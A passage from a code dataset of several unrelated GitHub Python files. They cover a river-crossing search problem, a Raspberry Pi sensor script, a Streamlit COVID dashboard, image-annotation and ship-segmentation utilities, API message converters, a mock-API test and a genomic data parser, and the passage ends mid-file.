(node.R - set(\"R\")):\n new_temp_set = temp_set.union(set(item))\n new_temp_node = River_Node(node.L.union(new_temp_set), node.R - new_temp_set)\n \n if self.is_valid_node(new_temp_node):\n valid_arcs.append(Arc(node, new_temp_node, 1, \"PICKUP {0} AND MOVE TO LEFT\".format(item)))\n\n return valid_arcs\n\n def heuristic(self,n):\n \"\"\"Gives the heuristic value of node n.\"\"\"\n return len(n.L)\n\n def is_valid_node(self,n):\n \"\"\"Checks if a node is a valid node according to problem\"\"\"\n\n # raft = set(\"R\")\n # invalid_HG = set(\"HG\")\n # invalid_FH = set(\"FH\")\n # These python sets don't really work as what I expected them to....\n\n # Check Left\n if \"H\" in n.L and \"G\" in n.L and \"R\" not in n.L: # ie. The Hen and Grain cannot be left without the farmer (raft)\n return False \n if \"F\" in n.L and \"H\" in n.L and \"R\" not in n.L: # ie. The Fox and Hen cannot be left without the farmer (raft)\n return False \n \n # Check Right\n if \"H\" in n.R and \"G\" in n.R and \"R\" not in n.R: # ie. The Hen and Grain cannot be left without the farmer (raft)\n return False \n if \"F\" in n.R and \"H\" in n.R and \"R\" not in n.R: # ie. The Fox and Hen cannot be left without the farmer (raft)\n return False \n\n return True # If both sides of the river are valid then the Node as whole is valid.\n\nif __name__ == \"__main__\":\n\n x = River_problem()\n\n for item in x.neighbors(River_Node(\"FG\", \"RH\")):\n print(item)\n\n print()\n\n","repo_name":"shouyang/CMPUT-366","sub_path":"cmput_366_a1/19f-cmput366-assignment1/_pythonCode/riverProblem.py","file_name":"riverProblem.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37218120072","text":"#!/usr/local/bin/python\n\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\npin_to_circuit = 7\n\ndef rc_time ():\n count = 0\n \n GPIO.setup(7, GPIO.OUT)\n GPIO.output(7, GPIO.LOW)\n time.sleep(0.1)\n\n GPIO.setup(7, GPIO.IN)\n init_time = time.time() \n \n while (GPIO.input(7) == GPIO.LOW):\n count += 1\n if(time.time() - init_time >= 0.05):\n return count/1e3 \n return count/1e3\n\ndef main():\n try:\n while True:\n print(rc_time())\n except KeyboardInterrupt:\n pass\n finally:\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n main()","repo_name":"rhitayu2/solar-cell-maintenance","sub_path":"ldr.py","file_name":"ldr.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42986623325","text":"import requests\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport csv\r\n\r\n\r\n@st.cache\r\ndef load_data(url):\r\n try:\r\n res = requests.get(url)\r\n return res, True\r\n except:\r\n return -1, False\r\n\r\n\r\ndef daily_cases(df):\r\n st.header(\"Today's Stats\")\r\n col1, col2, col3 = st.columns(3)\r\n col1.metric(\"Confirmed\", int(df['Daily Confirmed'][-1]),\r\n (int(df['Daily Confirmed'][-1]) - int(df['Daily Confirmed'][-2])))\r\n col2.metric(\"Deceased\", int(df['Daily Deceased'][-1]),\r\n (int(df['Daily Deceased'][-1]) - int(df['Daily Deceased'][-2])))\r\n col3.metric(\"Recovered\", int(df['Daily Recovered'][-1]),\r\n (int(df['Daily Recovered'][-1]) - int(df['Daily Recovered'][-2])))\r\n\r\n st.header(\"Daily confirmed cases -:\")\r\n st.line_chart(df['Daily Confirmed'].rolling(7).mean())\r\n\r\n st.header(\"Daily Deceased cases -:\")\r\n st.line_chart(df['Daily Deceased'].rolling(7).mean())\r\n\r\n st.header(\"Daily Recovered cases -:\")\r\n st.line_chart(df['Daily Recovered'].rolling(7).mean())\r\n\r\n\r\ndef total_cases(df):\r\n st.header(\"Total Stats\")\r\n col1, col2, col3 = st.columns(3)\r\n col1.metric(\"Confirmed\", int(df['Total Confirmed'][-1]))\r\n col2.metric(\"Deceased\", int(df['Total Deceased'][-1]))\r\n col3.metric(\"Recovered\", int(df['Total Recovered'][-1]))\r\n\r\n st.header(\"Total confirmed cases -:\")\r\n st.bar_chart(df['Total Confirmed'].rolling(7).mean())\r\n\r\n st.header(\"Total Deceased cases -:\")\r\n st.bar_chart(df['Total Deceased'].rolling(7).mean())\r\n\r\n st.header(\"Total Recovered cases -:\")\r\n st.bar_chart(df['Total Recovered'].rolling(7).mean())\r\n\r\n\r\ndef plot_data():\r\n df1 = pd.DataFrame(data)\r\n df = df1.copy()\r\n # -------------------- Data cleaning ----------------\r\n df.columns = df.iloc[0]\r\n df.drop(df.index[0], inplace=True)\r\n\r\n df['Date'] = pd.to_datetime(df['Date'])\r\n df['Date_YMD'] = pd.to_datetime(df['Date_YMD'])\r\n df['Daily Confirmed'] = pd.to_numeric(df['Daily Confirmed'])\r\n df['Total Confirmed'] = pd.to_numeric(df['Total Confirmed'])\r\n df['Daily Recovered'] = pd.to_numeric(df['Daily Recovered'])\r\n df['Total Recovered'] = pd.to_numeric(df['Total Recovered'])\r\n df['Daily Deceased'] = pd.to_numeric(df['Daily Deceased'])\r\n df['Total Deceased'] = pd.to_numeric(df['Total Deceased'])\r\n\r\n df.index = df['Date']\r\n # --------------------------------------------------------\r\n\r\n # ------------------- side bar ---------------------------\r\n st.sidebar.title(\"Covid-19 in India\")\r\n show_data = st.sidebar.checkbox(\"ShowData\")\r\n if show_data:\r\n st.subheader(\"Dataset\")\r\n st.write(df)\r\n\r\n select_cases = st.sidebar.selectbox(\"Select cases\", ['Daily', 'Total'])\r\n if select_cases == \"Daily\":\r\n daily_cases(df)\r\n if select_cases == \"Total\":\r\n total_cases(df)\r\n\r\n\r\n# ----------------------- Main code --------------------------------\r\nurl = 'https://data.covid19india.org/csv/latest/case_time_series.csv'\r\nurl2 = 'https://data.covid19india.org/v4/min/data.min.json'\r\nst.title(\"Covid cases in India\")\r\nst.write(\"Fetching data...\")\r\nres, success = load_data(url)\r\ndata = csv.reader(res.text.strip().split('\\n'))\r\nif success:\r\n st.write(\"Fetching data...complete\")\r\n plot_data()\r\nelse:\r\n st.write(\"Fetching data...failed,\\n refresh page\")\r\n","repo_name":"singh-hemant/covid19-india","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"44056893624","text":"def emptydir(dirname):\r\n if os.path.isdir(dirname):\r\n shutil.rmtree(dirname)\r\n sleep(2) #需延遲,否則會出錯\r\n os.mkdir(dirname)\r\n\r\nfrom PIL import Image, ImageDraw\r\nimport shutil, os\r\nfrom time import sleep\r\n\r\nfp = open('Haar-Training_carPlate/training/positive/info.txt', 'r')\r\nlines = fp.readlines() #讀取所有文字\r\nemptydir('picMark')\r\nprint('開始繪製圖框!')\r\nfor line in lines:\r\n data = line.split(' ')\r\n img = Image.open('Haar-Training_carPlate/training/positive/' + data[0]) #讀取檔案\r\n draw = ImageDraw.Draw(img) #繪圖\r\n n = data[1] #圖框數量\r\n #繪製圖框\r\n for i in range(int(n)):\r\n x = int(data[2+i*4])\r\n y = int(data[3+i*4])\r\n w = int(data[4+i*4])\r\n h = int(data[5+i*4])\r\n draw.rectangle((x, y, x+w, y+h), outline='red')\r\n filename = (data[0].split('/'))[-1]\r\n img.save('picMark/' + filename) #存檔\r\n\r\nfp.close() \r\nprint('繪製圖框結束!') ","repo_name":"HCHRJL/Image-Recognition","sub_path":"車牌辨識/picMark.py","file_name":"picMark.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"28484817187","text":"\"\"\"Compliance utilities.\"\"\"\n\n\ndef message2std(message):\n \"\"\"Convert ROBOKOP message format to standard message format.\n\n ROBOKOP: https://github.com/NCATS-Gamma/robokop-rank/blob/master/ranker/definitions.py\n standard: https://github.com/NCATS-Tangerine/NCATS-ReasonerStdAPI/blob/master/API/TranslatorReasonersAPI.yaml\n \"\"\"\n message['query_graph'] = message.pop('question_graph')\n for node in message['query_graph']['nodes']:\n node['node_id'] = node.pop('id')\n for edge in message['query_graph']['edges']:\n edge['edge_id'] = edge.pop('id')\n return message\n\n\ndef std2message(query):\n \"\"\"Convert ROBOKOP message format to standard message format.\n\n ROBOKOP: https://github.com/NCATS-Gamma/robokop-rank/blob/master/ranker/definitions.py\n standard: https://github.com/NCATS-Tangerine/NCATS-ReasonerStdAPI/blob/master/API/TranslatorReasonersAPI.yaml\n \"\"\"\n message = query['query_message']\n message['question_graph'] = message.pop('query_graph')\n for node in message['question_graph']['nodes']:\n node['id'] = node.pop('node_id')\n for edge in message['question_graph']['edges']:\n edge['id'] = edge.pop('edge_id')\n return message\n","repo_name":"NCATS-Gamma/robokop-rank","sub_path":"ranker/api/compliance.py","file_name":"compliance.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"18709284557","text":"import base64\n\nimport cv2 # OpenCV Library\nfrom keras.models import load_model\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nfrom check_contour import is_image_contoured\n\nprint(cv2.__version__)\n\n\ndef classify_image(im_b64):\n countered_image = is_image_contoured(im_b64)\n size = (224, 224)\n if countered_image is not False:\n model = load_model('./converted_keras/keras_model.h5')\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n # Replace this with the path to your image\n image = countered_image\n height, width, channels = image.shape\n scale_value = width / height\n # resize the image to a 224x224 with the same strategy as in TM2:\n # resizing the image to be at least 224x224 and then cropping from the center\n\n image = cv2.resize(image, size, fx=scale_value, fy=1, interpolation=cv2.INTER_NEAREST)\n # image = ImageOps.fit(image, size, Image.ANTIALIAS)\n image_array = np.asarray(image)\n # Normalize the image\n normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\n # Load the image into the array\n data[0] = normalized_image_array\n\n # run the inference\n prediction = model.predict(data)\n for predict in prediction[0]:\n print(predict)\n return {\"white\": prediction[0].tolist()[0], \"green\": prediction[0].tolist()[1]}\n else:\n return {\"result\": \"image has no 30 cuntours!\"}","repo_name":"VerioN1/ML-VarCode-Sticker","sub_path":"classify_image.py","file_name":"classify_image.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25036148412","text":"import os\nimport re\nimport pydoc\nimport torch\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pathlib import Path\nfrom PIL import Image\nfrom typing import Any, Dict, Optional, Union, List\nfrom skimage.util import montage\nfrom skimage.morphology import binary_opening, disk, label\n\n\ndef average(outputs: list, name: str) -> torch.Tensor:\n \"\"\"\n Compute the average of a specific tensor across a list of outputs.\n\n Args:\n outputs (list): A list of dictionaries representing the output data.\n name (str): The key name of the tensor to compute the average for.\n\n Returns:\n torch.Tensor: The average value of the specified tensor across all outputs.\n\n Raises:\n TypeError: If the input `outputs` is not a list.\n KeyError: If the specified `name` is not present in the output dictionaries.\n ValueError: If the shape of the tensor specified by `name` is not supported.\n\n \"\"\"\n if len(outputs[0][name].shape) == 0:\n return torch.stack([x[name] for x in outputs]).mean()\n return torch.cat([x[name] for x in outputs]).mean()\n\ndef montage_rgb(x: np.ndarray) -> np.ndarray:\n return np.stack([montage(x[:, :, :, i]) for i in range(x.shape[3])], -1)\n\n\ndef multi_rle_encode(img, **kwargs):\n \"\"\"\n Encode connected regions as separated masks.\n\n Args:\n img (ndarray): The input image containing connected regions.\n **kwargs: Additional keyword arguments to be passed to the `rle_encode` function.\n\n Returns:\n list: A list of encoded masks, each corresponding to a connected region.\n \"\"\"\n\n labels = label(img)\n if img.ndim > 2:\n return [rle_encode(np.sum(labels == k, axis=2), **kwargs) for k in np.unique(labels[labels > 0])]\n else:\n return [rle_encode(labels == k, **kwargs) for k in np.unique(labels[labels > 0])]\n\n\ndef rle_encode(img, min_max_threshold=1e-3, max_mean_threshold=None):\n \"\"\"\n img: numpy array, 1 - mask, 0 - background\n Returns run length as string formatted\n \"\"\"\n if np.max(img) < min_max_threshold:\n return '' # no need to encode if it's all zeros\n if max_mean_threshold and np.mean(img) > max_mean_threshold:\n return '' # ignore overfilled mask\n pixels = img.T.flatten()\n pixels = np.concatenate([[0], pixels, [0]])\n runs = np.where(pixels[1:] != pixels[:-1])[0] + 1\n runs[1::2] -= runs[::2]\n return ' '.join(str(x) for x in runs)\n\n\ndef rle_decode(mask_rle, shape=(768, 768)) -> np.ndarray:\n \"\"\"\n mask_rle: run-length as string formatted (start length)\n shape: (height,width) of array to return\n Returns numpy array, 1 - mask, 0 - background\n \"\"\"\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0] * shape[1], dtype=np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T # Needed to align to RLE direction\n\n\ndef masks_as_image(in_mask_list) -> np.ndarray:\n \"\"\"Take the individual ship masks and create a single mask array for all ships\"\"\"\n all_masks = np.zeros((768, 768), dtype=np.uint8)\n for mask in in_mask_list:\n if isinstance(mask, str):\n all_masks |= rle_decode(mask)\n return all_masks\n\n\ndef masks_as_color(in_mask_list) -> np.ndarray:\n \"\"\"Take the individual ship masks and create a color mask array for each ships\"\"\"\n all_masks = np.zeros((768, 768), dtype=np.float)\n scale = lambda x: (len(in_mask_list) + x + 1) / (len(in_mask_list) * 2) # scale the heatmap image to shift\n for i, mask in enumerate(in_mask_list):\n if isinstance(mask, str):\n all_masks[:, :] += scale(i) * rle_decode(mask)\n return all_masks\n\ndef object_from_dict(d, parent=None, **default_kwargs):\n \"\"\"\n Create an object from a dictionary representation.\n\n Args:\n d (dict): A dictionary containing the object's attributes.\n parent (object, optional): The parent object to create the object from (default: None).\n **default_kwargs: Additional keyword arguments with default values to be used for object creation.\n\n Returns:\n object: The created object.\n \"\"\"\n kwargs = d.copy()\n object_type = kwargs.pop(\"type\")\n for name, value in default_kwargs.items():\n kwargs.setdefault(name, value)\n\n if parent is not None:\n return getattr(parent, object_type)(**kwargs) # skipcq PTC-W0034\n\n return pydoc.locate(object_type)(**kwargs)\n\ndef rename_layers(\n state_dict: Dict[str, Any], rename_in_layers: Dict[str, Any]\n) -> Dict[str, Any]:\n \"\"\"\n Renames specified layers in the state_dict based on the provided mapping.\n\n Args:\n state_dict (Dict[str, Any]): The original state dictionary containing layer names and values.\n rename_in_layers (Dict[str, Any]): A dictionary specifying the layer names to be renamed and their corresponding new names.\n\n Returns:\n Dict[str, Any]: The modified state dictionary with renamed layers.\n\n \"\"\"\n\n result = {}\n for key, value in state_dict.items():\n for key_r, value_r in rename_in_layers.items():\n key = re.sub(key_r, value_r, key)\n\n result[key] = value\n\n return result\n\n\ndef state_dict_from_disk(\n file_path: Union[Path, str], rename_in_layers: Optional[Dict[str, Any]] = None\n) -> Dict[str, Any]:\n \"\"\"Loads PyTorch checkpoint from disk, optionally renaming layer names.\n Args:\n file_path: path to the torch checkpoint.\n rename_in_layers: {from_name: to_name}\n ex: {\"model.0.\": \"\",\n \"model.\": \"\"}\n Returns:\n \"\"\"\n checkpoint = torch.load(file_path, map_location=lambda storage, loc: storage)\n\n if \"state_dict\" in checkpoint:\n state_dict = checkpoint[\"state_dict\"]\n else:\n state_dict = checkpoint\n\n if rename_in_layers is not None:\n state_dict = rename_layers(state_dict, rename_in_layers)\n\n return state_dict\n\ndef tensor_to_image(tens):\n \"\"\"\n Converts a tensor to a PIL Image.\n\n Args:\n tens (torch.Tensor): The input tensor to be converted to an image.\n\n Returns:\n PIL.Image.Image: The PIL Image converted from the input tensor.\n\n \"\"\"\n array = tens.squeeze(0).permute(1, 2, 0).numpy() * 255\n array = array.astype(np.uint8)\n pil_img = Image.fromarray(array)\n return pil_img\n\ndef mask_tensor_to_image(tens):\n \"\"\"\n Converts a tensor mask to a PIL Image.\n\n Args:\n tens (torch.Tensor): The input tensor to be converted to an image.\n\n Returns:\n PIL.Image.Image: The PIL Image converted from the input tensor.\n\n \"\"\"\n array = tens.permute(1, 2, 0).numpy() * 255\n array = np.squeeze(array.astype(np.uint8), -1)\n pil_img = Image.fromarray(array)\n return pil_img\n\ndef visualize(**images):\n \"\"\"\n Visualizes multiple images in a grid.\n\n Args:\n **images: Multiple keyword arguments where the key is the name of the image and the value is the image data.\n\n Returns:\n None\n\n \"\"\"\n n = len(images)\n plt.figure(figsize=(16, 5))\n for i, (name, image) in enumerate(images.items()):\n plt.subplot(1, n, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.title(\" \".join(name.split(\"_\")).title())\n plt.imshow(image)\n plt.show()\n\nif __name__ == \"__main__\":\n pass","repo_name":"atgorvi/AirbusShipDetectionTorch","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71355071474","text":"import os\n\nimport responses\n\nfrom tamr_unify_client import Client\nfrom tamr_unify_client.auth import UsernamePasswordAuth\nfrom tests.mock_api.utils import mock_api\n\n\nbasedir = os.path.dirname(__file__)\nresponse_log_path = os.path.join(\n basedir, \"../response_logs/continuous_mastering.ndjson\"\n)\n\n\n@mock_api(response_log_path)\ndef test_continuous_mastering():\n auth = UsernamePasswordAuth(\"username\", \"password\")\n unify = Client(auth)\n\n project_id = \"1\"\n project = unify.projects.by_resource_id(project_id)\n project = project.as_mastering()\n\n unified_dataset = project.unified_dataset()\n op = unified_dataset.refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = project.pairs().refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n model = project.pair_matching_model()\n op = model.train(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = model.predict(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = project.record_clusters().refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = project.published_clusters().refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n estimate_url = (\n \"http://localhost:9100/api/versioned/v1/projects/1/estimatedPairCounts\"\n )\n estimate_json = {\n \"isUpToDate\": \"true\",\n \"totalEstimate\": {\"candidatePairCount\": \"200\", \"generatedPairCount\": \"100\"},\n \"clauseEstimates\": {\n \"clause1\": {\"candidatePairCount\": \"50\", \"generatedPairCount\": \"25\"},\n \"clause2\": {\"candidatePairCount\": \"50\", \"generatedPairCount\": \"25\"},\n \"clause3\": {\"candidatePairCount\": \"100\", \"generatedPairCount\": \"50\"},\n },\n }\n responses.add(responses.GET, estimate_url, json=estimate_json)\n\n status = project.estimate_pairs().is_up_to_date\n assert status\n\n candidate = project.estimate_pairs().total_estimate[\"candidatePairCount\"]\n assert candidate == \"200\"\n\n clause1 = project.estimate_pairs().clause_estimates[\"clause1\"]\n assert clause1[\"generatedPairCount\"] == \"25\"\n","repo_name":"Datatamer/tamr-client","sub_path":"tests/mock_api/test_continuous_mastering.py","file_name":"test_continuous_mastering.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"39"} +{"seq_id":"1511439277","text":"#!/usr/bin/env python3\n\n\n\nimport sys\nfrom collections import OrderedDict\nimport argparse\n\nfrom BasicTools import invertDict\nfrom FileTools import getHeadExt\n\nlbls = {}\n\nlbls.update({\"chr\" : 0 }) # chromosome index 1 2 3, X\nlbls.update({\"begin\" : 1 }) # beginning of the measured segment \nlbls.update({\"end\" : 2 }) #\"ending of the measured segment \nlbls.update({\"ctcf1\" : 3 }) # direction of the first CTCF (L/R) \nlbls.update({\"ctcf2\" : 4 }) # direction of the second CTCF (L/R) \nlbls.update({\"nPET\" : 5 }) # number of PET counts \nlbls.update({\"cmplx1\" : 6 }) # complexity (general) \nlbls.update({\"cmplx2\" : 7 }) # complexity (definition A) \nlbls.update({\"cmplx3\" : 8 }) # complexity (definition B) \nlbls.update({\"len\" : 9 }) # genomic distance\nlbls.update({\"dG_0\" : 10 }) # free energy of first structure\nlbls.update({\"TdS_0\" : 11 }) # entropy of first structure\nlbls.update({\"dGbar\" : 12 }) # average FE per segment dG_0/len\nlbls.update({\"TdSbar\" : 13 }) # average S per sgement TdS_0/len\nlbls.update({\"p_max\" : 14 }) # prob of the min FE structure\n# similarity and hamming: see Functions\n# p_sim sim cmplx -> scmplx\n# p_ham ham cmplx -> hcmplx\n# p_dTdS dTdS cmplx -> ecmplx\n# p_ddG ddG cmplx -> gcmplx\nlbls.update({\"p_sim\" : 15 }) # similarity index\nlbls.update({\"scmplx\" : 16 }) # numb iterations\nlbls.update({\"p_ham\" : 17 }) # hamming distance\nlbls.update({\"hcmplx\" : 18 }) # numb iterations\nlbls.update({\"p_dTdS\" : 19 }) # calculate from d(TdS) prob\nlbls.update({\"ecmplx\" : 20 }) # numb iterations\nlbls.update({\"p_ddG\" : 21 }) # calculate from d(dG) prob\nlbls.update({\"gcmplx\" : 22 }) # numb iterations\nlbls.update({\"open\" : 23 }) # from ATAC-seq\nlbls.update({\"active\" : 24 }) # from chromHMM and/or segway\nlbls.update({\"A\" : 25 }) # region A\nlbls.update({\"B\" : 26 }) # region B\n\n\nrlbls = invertDict(lbls) # reverse to { 0 : \"chr\" }\n\n\nfldInfo = {\n \"chr\" : \"chromosome index 1 2 3, X\",\n \"begin\" : \"beginning of the measured segment\",\n \"end\" : \"ending of the measured segment\",\n \"ctcf1\" : \"direction of the first CTCF (L/R)\",\n \"ctcf2\" : \"direction of the second CTCF (L/R)\",\n \"nPET\" : \"number of PET counts \",\n \"cmplx1\" : \"complexity (general) \",\n \"cmplx2\" : \"complexity (definition A) \",\n \"cmplx3\" : \"complexity (definition B) \",\n \"len\" : \"genomic distance\",\n \"dG_0\" : \"free energy of first structure\",\n \"TdS_0\" : \"entropy of first structure\",\n \"dGbar\" : \"average FE per segment dG_0/len\",\n \"TdSbar\" : \"average S per sgement TdS_0/len\",\n \"p_max\" : \"prob of the min FE structure\",\n \"p_sim\" : \"similarity index\",\n \"scmplx\" : \"numb iterations of similarity\",\n \"p_ham\" : \"hamming distance\",\n \"hcmplx\" : \"numb iterations of hamming\",\n \"p_dTdS\" : \"calculate from d(TdS) prob\",\n \"ecmplx\" : \"numb iterations of d(TdS)\",\n \"p_ddG\" : \"calculate from d(dG) prob\",\n \"gcmplx\" : \"numb iterations of d(dG)\",\n \"active\" : \"from chromHMM and/or segway\",\n \"open\" : \"from ATAC-seq\",\n \"A\" : \"region A\",\n \"B\" : \"region B\"\n}\n\n\nfldUnits = {\n \"chr\" : \"none\",\n \"begin\" : \"bp\",\n \"end\" : \"bp\",\n \"ctcf1\" : \"none\",\n \"ctcf2\" : \"none\",\n \"nPET\" : \"counts\",\n \"cmplx1\" : \"order\",\n \"cmplx2\" : \"order\",\n \"cmplx3\" : \"order\",\n \"len\" : \"[/5 kbp]\",\n \"dG_0\" : \"[kcal/mol]\",\n \"TdS_0\" : \"[kcal/mol]\",\n \"dGbar\" : \"[kcal/mol/5kbp]\",\n \"TdSbar\" : \"[kcal/mol/5kbp]\",\n \"p_max\" : \"[units]\",\n \"p_sim\" : \"[units]\",\n \"scmplx\" : \"[n/a]\",\n \"p_ham\" : \"[units]\",\n \"hcmplx\" : \"[n/a]\",\n \"p_dTdS\" : \"[units]\",\n \"ecmplx\" : \"[n/a]\",\n \"p_ddG\" : \"[units]\",\n \"gcmplx\" : \"[n/a]\",\n \"active\" : \"[units]\",\n \"open\" : \"[units]\",\n \"A\" : \"[units]\",\n \"B\" : \"[units]\"\n}\n\nallowed = {\"begin\" : 1, \n \"end\" : 2, \n \"nPET\" : 5, \n \"cmplx1\" : 6, \n \"cmplx2\" : 7, \n \"cmplx3\" : 8, \n \"len\" : 9, \n \"dG_0\" : 10, \n \"TdS_0\" : 11, \n \"dGbar\" : 12, \n \"TdSbar\" : 13, \n \"p_max\" : 14, \n \"p_sim\" : 15, \n \"scmplx\" : 16, \n \"p_ham\" : 17, \n \"hcmplx\" : 18, \n \"p_dTdS\" : 19, \n \"ecmplx\" : 20, \n \"p_ddG\" : 21, \n \"gcmplx\" : 22 \n}\n\nrallowed = invertDict(allowed)\n\ndef showOptions():\n vv = list(rallowed)\n for vvk in vv:\n print (\"%-8s %-50s\" % (rallowed[vvk], fldInfo[rallowed[vvk]]))\n #\n#\n\n# sort the results from HotSpots\ndef insSortListByIndex(alist, ndx = 0):\n for i in range(1,len(alist)): \n j = i\n \"\"\"@\n \n sort according to the component ndx in \"alist\". For example,\n suppose alist is of the following arrangement:\n \n > alist += [(i, j, mbl, V)] # (i, j, class MBL, dG)\n \n if we want to sort the free energy -- the third component in\n the list (starting from 0 to 3) -- then we call\n \n > alist = insSortListByIndex(alist, 3) \n \n and the third component will be sorted\n \n \"\"\"\n \n while j > 0 and alist[j][ndx] < alist[j-1][ndx]: \n alist[j], alist[j-1] = alist[j-1], alist[j] # syntactic sugar: swap the items\n j=j-1 \n #|endwhile\n \n #|endfor\n \n return alist\n#\n\n\n \nclass GenomicOrderParams(object):\n def __init__(self):\n self.flhd = ''\n self.ext = ''\n self.adata = OrderedDict()\n self.lenbar = 0.0\n self.lenmx = 0\n self.lenmn = 1e9\n self.total = 0\n self.binlist = {}\n self.binavgL = []\n self.bins = {}\n self.binsize = 0\n \n #\n \n def showStats(self):\n s = (\"overall length [/5 kbp]:\\n\")\n s += (\"min len: %4d\\n\" % self.lenmn)\n s += (\"max len: %4d\\n\" % self.lenmx)\n s += (\"avg len: %8.2f\" % self.lenbar)\n return s\n #\n \n def showGDrange(self, ndx):\n v = self.binlist[ndx]\n s = (\"genomic distance from: %d to %d /5kbp\" % (v[0], v[1]))\n return s\n #\n \n \n def readAnalLoopData(self, flnm):\n try:\n fp = open(flnm, 'r')\n except IOError:\n print (\"Cannot open %s\" % flnm)\n sys.exit(1)\n #\n \n lfp = fp.readlines()\n fp.close()\n\n self.flhd, self.ext = getHeadExt(flnm)\n \n kdt = 0\n for k in range(0, len(lfp)):\n slfp = lfp[k].strip()\n if slfp[0] == '#':\n continue\n #\n \n sl = slfp.split()\n vv = sl[0][:3]\n ndx = sl[0][3:]\n if len(ndx) == 1:\n ndx = '_' + ndx\n # print (vv, sl[0][3:])\n tag = vv + ndx + '_' + sl[1].zfill(9) + '_' + sl[2].zfill(9)\n sl[1] = int(sl[1])\n sl[2] = int(sl[2])\n sl[lbls[\"nPET\"]] = int(sl[lbls[\"nPET\"]][2:])\n # cmplx1 cmplx2 cmplx3\n sl[lbls[\"cmplx1\"]] = int(sl[lbls[\"cmplx1\"]][3:])\n sl[lbls[\"cmplx2\"]] = int(sl[lbls[\"cmplx2\"]][3:])\n sl[lbls[\"cmplx3\"]] = int(sl[lbls[\"cmplx3\"]][3:])\n \n #print (tag, sl[lbls[\"nPET\"]], sl[lbls[\"cmplx1\"]], sl[lbls[\"cmplx2\"]], sl[lbls[\"cmplx3\"]])\n \n # len \n sl[lbls[\"len\"]] = int(sl[lbls[\"len\"]])\n self.lenbar += sl[lbls[\"len\"]]\n if sl[lbls[\"len\"]] > self.lenmx:\n self.lenmx = sl[lbls[\"len\"]]\n #\n \n if sl[lbls[\"len\"]] < self.lenmn:\n self.lenmn = sl[lbls[\"len\"]]\n #\n \n # dG_0 TdS_0 dGbar TdSbar p_max \n sl[lbls[\"dG_0\"]] = float(sl[lbls[\"dG_0\"]])\n sl[lbls[\"TdS_0\"]] = float(sl[lbls[\"TdS_0\"]])\n sl[lbls[\"dGbar\"]] = float(sl[lbls[\"dGbar\"]])\n sl[lbls[\"TdSbar\"]] = float(sl[lbls[\"TdSbar\"]])\n sl[lbls[\"p_max\"]] = float(sl[lbls[\"p_max\"]])\n \n \n # p_sim scmplx\n # p_ham hcmplx\n # p_dTdS ecmplx\n # p_ddG gcmplx\n \n sl[lbls[\"p_sim\"]] = float(sl[lbls[\"p_sim\"]]); sl[lbls[\"scmplx\"]] = float(sl[lbls[\"scmplx\"]])\n sl[lbls[\"p_ham\"]] = float(sl[lbls[\"p_ham\"]]); sl[lbls[\"hcmplx\"]] = float(sl[lbls[\"hcmplx\"]])\n sl[lbls[\"p_dTdS\"]] = float(sl[lbls[\"p_dTdS\"]]); sl[lbls[\"ecmplx\"]] = float(sl[lbls[\"ecmplx\"]])\n sl[lbls[\"p_ddG\"]] = float(sl[lbls[\"p_ddG\"]]); sl[lbls[\"gcmplx\"]] = float(sl[lbls[\"gcmplx\"]])\n \n # active open A B\n sl[lbls[\"active\"]] = float(sl[lbls[\"active\"]])\n sl[lbls[\"open\"]] = float(sl[lbls[\"open\"]])\n #print (len(sl))\n if len(sl) > 25:\n sl[lbls[\"A\"]] = float(sl[lbls[\"A\"]])\n sl[lbls[\"B\"]] = float(sl[lbls[\"B\"]])\n #\n \n self.adata.update({tag : sl})\n kdt += 1\n \"\"\"\n if kdt == 10:\n sys.exit(0)\n #\n \"\"\"\n #|endfor\n self.total = kdt\n self.lenbar = float(self.lenbar)/float(kdt)\n print (self.showStats())\n \n #\n\n def binnedData(self, binsize):\n if self.lenmx == 0:\n print (\"ERROR: data not set\")\n sys.exit(1)\n #\n \n self.binsize = binsize\n # reset all the binning \n self.binlist = {}\n self.bins = {}\n self.binavgL = []\n \n span = self.lenmx + 20\n dspan = span // binsize\n \n bgn = 0; end = dspan\n for k in range(0, binsize):\n self.binlist.update({k : (bgn, end)})\n self.bins.update({k : [] })\n lavg = 0\n n = 0\n for vv in self.adata.keys():\n #print (self.adata[vv])\n length = self.adata[vv][lbls[\"len\"]]\n if bgn <= length and length < end:\n lavg += length\n n += 1\n self.bins[k] += 